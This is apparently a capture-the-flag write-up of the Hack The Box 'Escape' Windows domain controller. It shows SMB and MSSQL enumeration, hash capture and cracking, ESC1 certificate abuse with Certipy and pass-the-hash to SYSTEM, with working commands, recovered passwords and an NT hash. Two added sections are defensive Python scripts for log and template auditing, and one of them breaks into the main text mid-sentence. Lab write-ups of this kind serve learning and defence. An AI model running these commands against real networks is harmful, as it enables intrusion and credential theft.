#hackthebox #medium #windows #ADCS #Certify #Certipy #MSSQL

![[Pasted image 20250801000311.png]]

# Information Gathering

- Nmap TCP scan against all ports revealed the following:

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -Pn -n --open --min-rate 3000 -p- -oN tcpAll
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-31 03:36 UTC
Nmap scan report for 10.10.11.202
Host is up (0.049s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49689/tcp open  unknown
49690/tcp open  unknown
49709/tcp open  unknown
49714/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 43.90 seconds
```

Another TCP scan against the ports found, for more information:

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49689,49690,49709,49714
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-31 03:38 UTC
Nmap scan report for 10.10.11.202
Host is up (0.050s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-31 11:41:33Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-31T11:43:02+00:00; +8h03m05s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
|_ssl-date: 2025-07-31T11:43:03+00:00; +8h03m05s from scanner time.
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   10.10.11.202:1433: 
|     Target_Name: sequel
|     NetBIOS_Domain_Name: sequel
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: dc.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
|_ssl-date: 2025-07-31T11:43:02+00:00; +8h03m05s from scanner time.
| ms-sql-info: 
|   10.10.11.202:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-07-31T11:37:19
|_Not valid after:  2055-07-31T11:37:19
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
|_ssl-date: 2025-07-31T11:43:02+00:00; +8h03m05s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
|_ssl-date: 2025-07-31T11:43:03+00:00; +8h03m05s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         Microsoft Windows RPC
49709/tcp open  msrpc         Microsoft Windows RPC
49714/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 8h03m04s, deviation: 0s, median: 8h03m04s
| smb2-time: 
|   date: 2025-07-31T11:42:24
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.55 seconds
```

Lastly, a UDP scan:

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sU --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-31 03:40 UTC
Nmap scan report for 10.10.11.202
Host is up (0.050s latency).

PORT     STATE         SERVICE
53/udp   open          domain
67/udp   open|filtered dhcps
123/udp  open          ntp
135/udp  open|filtered msrpc
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
161/udp  open|filtered snmp
445/udp  open|filtered microsoft-ds
631/udp  open|filtered ipp
1434/udp open|filtered ms-sql-m

Nmap done: 1 IP address (1 host up) scanned in 1.70 seconds
```

# Enumeration

##### SMB - TCP 139, 445

I'm pretty sure this is a DC host. The ports and the shares below make me almost certain of it.
`SMB` allows null authentication, which I confirmed with `smbclient` and `netexec`:

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient -N -L //$IP

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Public          Disk      
        SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

![[Pasted image 20250730224434.png]]

Inside the `Public` share, there's a PDF file. I downloaded the file to my Kali machine.

![[Pasted image 20250730225851.png]]

The PDF contained a lot of information, including three names: `Ryan`, `Tom`, and `Brandon`. Hovering over the hyperlink on the name `Brandon` revealed his email address: `[email protected]`

![[Pasted image 20250730230237.png]]

The next page also contained valuable information: a set of credentials! `PublicUser:GuestUserCantWrite1`

![[Pasted image 20250730230305.png]]

# Initial Access - as `sql_svc`

##### MSSQL - TCP 1433

I logged into `MSSQL` with the found credentials using `mssqlclient`:

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@$IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (PublicUser  guest@master)>
```

I tried `xp_cmdshell whoami`, but it was denied. I then tried enabling `xp_cmdshell`, but it said the current user has no permission to perform that action.
![[Pasted image 20250731215605.png]]

We can try `SMB forced authentication` with `xp_dirtree` plus `responder`. I was able to capture `sql_svc`'s hash.

![[Pasted image 20250731220619.png]]

Successfully cracked the hash with `hashcat`:

![[Pasted image 20250731220844.png]]

`sql_svc:REGGIE1234ronnie`

`nxc` confirms the credentials are valid.

![[Pasted image 20250731221021.png]]

# Lateral Movement - to `ryan.cooper`

Under `C:\`, there was a directory named `SQLServer`. Since we are currently logged in as the `sql_svc` user, it's very reasonable to explore that directory.

![[Pasted image 20250731223302.png]]

Inside `C:\SQLServer\Logs`, there was a backup file named `ERRORLOG.BAK`.

![[Pasted image 20250731223338.png]]

Inside the log file, there were two error entries that stood out to me. The first red box shows that `sequel.htb\Ryan.Cooper` failed to log in because his password did not match. Then, the second red box tells us that the user `NuclearMosquito3` entered the wrong password. This suggests that the user `Ryan.Cooper` might have first entered the wrong password, or accidentally pressed Enter too soon, and then typed his password into the username field, which could be `NuclearMosquito3`. I might be wrong, but they could potentially be a valid credential pair.

![[Pasted image 20250731223540.png]]

Successfully logged in as `Ryan.Cooper`:

![[Pasted image 20250731224318.png]]

Found `user.txt` in `C:\Users\Ryan.Cooper\Desktop`:

```powershell
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> dir

    Directory: C:\Users\Ryan.Cooper\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         8/1/2025   3:48 AM             34 user.txt

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> type user.txt
f6ad...
```

# Privilege Escalation

It's highly likely `AD CS` exists in the domain because the nmap results mentioned `ssl-cert` a few times, so I'm going to check for it using `Certify.exe`. Before that, I confirmed `AD CS` does exist in the domain using `nxc`.
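Stepping back to the `ERRORLOG.BAK` finding in the lateral-movement section: the pattern there, a password-mismatch failure for a real login followed within seconds, from the same client, by a "could not find a login" failure for a name that is not an account, is exactly what a password typed into the username field looks like, and it is worth hunting for in your own SQL Server error logs so the affected account can be reset before anyone else reads the log. The script below is an added example written for this writeup, not part of the original post or of any tool it uses; the log lines are constructed in the SQL Server ERRORLOG format (the client addresses and timestamps are made up), and the 30-second pairing window is an assumption.

```python
import re
from datetime import datetime, timedelta

# Constructed sample in the SQL Server ERRORLOG layout; not the box's real file.
SAMPLE_LOG = """\
2022-11-18 13:43:05.10 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:05.10 Logon       Login failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 5.
2022-11-18 13:43:07.48 Logon       Login failed for user 'NuclearMosquito3'. Reason: Could not find a login matching the name provided. [CLIENT: 10.10.14.5]
2022-11-18 13:50:12.00 Logon       Error: 18456, Severity: 14, State: 5.
2022-11-18 13:50:12.00 Logon       Login failed for user 'backup_svc'. Reason: Could not find a login matching the name provided. [CLIENT: 10.10.14.9]
2022-11-18 14:02:30.77 Logon       Login succeeded for user 'sequel.htb\\Ryan.Cooper'. Connection made using Windows authentication. [CLIENT: 10.10.14.5]
"""

# Matches only the "Login failed" lines; the "Error: 18456" lines carry no name.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'\. Reason: (?P<reason>[^\[]*?)\s*"
    r"\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_failed_logins(text):
    """Return failed-login events (timestamp, user, reason, client) in log order."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append({
                "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
                "user": m["user"],
                "reason": m["reason"],
                "client": m["client"],
            })
    return events


def find_credential_spills(events, window=timedelta(seconds=30)):
    """Flag an unknown-login failure that closely follows a password failure
    for a real login from the same client: the likely "password in the
    username box" mistake. Returns the account to reset and the spilled value."""
    hits = []
    for i, ev in enumerate(events):
        if not ev["reason"].startswith("Could not find a login"):
            continue
        for prev in events[:i]:
            same_client = prev["client"] == ev["client"]
            pw_failure = prev["reason"].startswith("Password did not match")
            gap = ev["ts"] - prev["ts"]
            if same_client and pw_failure and timedelta(0) <= gap <= window:
                hits.append({
                    "account": prev["user"],
                    "leaked_value": ev["user"],
                    "client": ev["client"],
                    "ts": ev["ts"],
                })
                break
    return hits


if __name__ == "__main__":
    for hit in find_credential_spills(parse_failed_logins(SAMPLE_LOG)):
        print(f"{hit['ts']} {hit['client']}: reset {hit['account']!r}; "
              f"a secret-looking value {hit['leaked_value']!r} was logged in clear text")
```

The `backup_svc` failure is deliberately left unflagged: it is a plain unknown-login attempt from a different client minutes later, and a detection that fired on every "could not find a login" line would drown the real signal. The same pairing logic applies to the live `ERRORLOG` and to Windows Security event 4625, where the un-rotated backup copy in a world-readable directory is the bigger lesson from this box.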
I'll note the name of the CA.

![[Pasted image 20250731232243.png]]

Transferred `Certify.exe` from my local Kali machine to the remote `evil-winrm` session:

![[Pasted image 20250731232103.png]]

Now we can check whether any templates in AD CS are insecurely configured using `Certify.exe`. However, I kept failing to run the binary, so I'm going to use `Certipy` instead.

`certipy-ad find -u ryan.cooper -p NuclearMosquito3 -target $IP -stdout -vulnerable`

It reveals a template with the `ESC1` vulnerability:

![[Pasted image 20250731234419.png]]

We can see the CA name we discovered earlier using `nxc`, and I also grabbed the template name, `UserAuthentication`.

![[Pasted image 20250731234610.png]]

Then I requested the `.pfx` file using the command below:

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ certipy-ad req -u ryan.cooper -p NuclearMosquito3 -ca sequel-DC-CA -target $IP -template UserAuthentication -upn Administrator@sequel.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 13
[*] Successfully requested certificate
[*] Got certificate with UPN '[email protected]'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
```

I tried to get a TGT using the command below, but it failed because of the `clock skew`:

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip $IP
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: '[email protected]'
[*] Using principal: '[email protected]'
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[-] Use -debug to print a stacktrace
[-] See the wiki for more information
```

I tried to match my clock with the target using `sudo ntpdate $IP`, but it still did not work.
I do not know why, but the same error happened to me before, so I found this workaround on the Internet a while ago, which magically helped me out this time AGAIN! I got the hash for the `administrator` user.

```bash
┌──(root㉿kali)-[/home/kali/Desktop]
└─# timedatectl set-ntp off

┌──(root㉿kali)-[/home/kali/Desktop]
└─# rdate -n $IP
Fri Aug  1 12:57:29 UTC 2025

┌──(root㉿kali)-[/home/kali/Desktop]
└─# certipy-ad auth -pfx administrator.pfx -dc-ip $IP
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: '[email protected]'
[*] Using principal: '[email protected]'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
```

Finally, I got a shell as the `nt authority\system` user via `psexec`:

```bash
┌──(root㉿kali)-[/home/kali/Desktop]
└─# impacket-psexec administrator@$IP -hashes aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on 10.10.11.202.....
[*] Found writable share ADMIN$
[*] Uploading file UifofcKK.exe
[*] Opening SVCManager on 10.10.11.202.....
[*] Creating service bZeq on 10.10.11.202.....
[*] Starting service bZeq.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

Got `root.txt`:

```powershell
 Directory of C:\Users\Administrator\Desktop

02/06/2023  04:43 PM    <DIR>          .
02/06/2023  04:43 PM    <DIR>          ..
08/01/2025  03:48 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   5,993,553,920 bytes free

C:\Users\Administrator\Desktop> type root.txt
8a5c...
```
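What `certipy-ad find -vulnerable` was telling us when it labelled `UserAuthentication` as `ESC1` is a conjunction of template settings, and the fix on the defending side is to break any one of them (the usual choice is clearing "Enrollee Supplies Subject" or requiring manager approval). The audit below is an added example for this writeup, not code from the original post or from Certipy: it evaluates each ESC1 precondition separately over constructed template records, so a report can say which setting to change. The `Template` structure and the two sample templates (shaped after the `UserAuthentication` finding above, with an assumed `WebServer` template as the non-vulnerable contrast) are assumptions, not the box's real Certipy output.

```python
from dataclasses import dataclass, replace

# EKUs that let the issued certificate be used for Kerberos (PKINIT) logon.
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
             "Smart Card Logon", "Any Purpose"}
# Principals that every domain account (or computer) already belongs to.
LOW_PRIV_GROUPS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}


@dataclass(frozen=True)
class Template:
    name: str
    enabled: bool
    enrollee_supplies_subject: bool   # the "Enrollee Supplies Subject" flag
    ekus: frozenset                   # Extended Key Usages; empty = no EKU restriction
    requires_manager_approval: bool
    authorized_signatures_required: int
    enrollment_rights: frozenset      # principals allowed to enroll


def _low_priv(principal):
    # Accept both "DOMAIN\Group" and bare group names.
    return principal.split("\\")[-1] in LOW_PRIV_GROUPS


def esc1_conditions(t):
    """Each ESC1 precondition on its own, so the report names what to fix."""
    return {
        "enabled": t.enabled,
        "enrollee_supplies_subject": t.enrollee_supplies_subject,
        "auth_eku_or_none": (not t.ekus) or bool(t.ekus & AUTH_EKUS),
        "no_manager_approval": not t.requires_manager_approval,
        "no_signatures_required": t.authorized_signatures_required == 0,
        "low_priv_can_enroll": any(_low_priv(p) for p in t.enrollment_rights),
    }


def is_esc1(t):
    return all(esc1_conditions(t).values())


def harden(t):
    """Return a copy with the two settings that most directly close ESC1 changed."""
    return replace(t, enrollee_supplies_subject=False, requires_manager_approval=True)


def audit(templates):
    """Names of the templates that satisfy every ESC1 precondition."""
    return [t.name for t in templates if is_esc1(t)]


# Constructed sample records shaped like a Certipy "find" result (assumed values).
USER_AUTHENTICATION = Template(
    name="UserAuthentication", enabled=True, enrollee_supplies_subject=True,
    ekus=frozenset({"Client Authentication", "Secure Email", "Encrypting File System"}),
    requires_manager_approval=False, authorized_signatures_required=0,
    enrollment_rights=frozenset({"SEQUEL.HTB\\Domain Users", "SEQUEL.HTB\\Domain Admins"}))

WEB_SERVER = Template(
    name="WebServer", enabled=True, enrollee_supplies_subject=True,
    ekus=frozenset({"Server Authentication"}),
    requires_manager_approval=False, authorized_signatures_required=0,
    enrollment_rights=frozenset({"SEQUEL.HTB\\Domain Admins"}))


if __name__ == "__main__":
    for t in (USER_AUTHENTICATION, WEB_SERVER):
        failed = [k for k, ok in esc1_conditions(t).items() if not ok]
        print(t.name, "ESC1" if is_esc1(t) else f"ok (missing: {failed})")
    print("UserAuthentication after hardening:", is_esc1(harden(USER_AUTHENTICATION)))
```

`WebServer` is kept as the contrast case on purpose: it also lets the enrollee supply the subject, but its only EKU is `Server Authentication`, so a certificate from it cannot authenticate a user and the template is not ESC1 by itself. Running `esc1_conditions` on every enabled template published by the CA, rather than stopping at the first hit, is what turns the single finding from this box into a repeatable check.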